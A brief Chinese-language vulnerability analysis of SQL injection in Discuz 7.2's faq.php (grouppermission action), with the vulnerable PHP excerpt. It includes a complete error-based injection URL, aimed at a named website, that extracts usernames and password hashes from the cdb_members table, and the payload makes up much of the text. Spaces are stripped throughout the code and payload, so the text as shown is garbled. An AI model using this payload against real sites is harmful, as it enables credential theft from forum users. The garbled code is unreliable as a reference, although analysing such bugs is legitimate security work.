Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
漏洞分析:byphithon
($action=='grouppermission'){
... ksort($gids); $groupids=array(); foreach($gidsas$row){ $groupids[]=$row[0]; }
$query=$db->query("SELECT*FROM{$tablepre}usergroupsuLEFTJOIN{$tablepre}admingroupsaONu.groupid=a.admingidWHEREu.groupidIN(".implodeids($groupids).")"); ... } functionimplodeids($array){ if(!empty($array)){ return"'".implode("','",is_array($array)?$array:array($array))."'"; }else{ return''; } }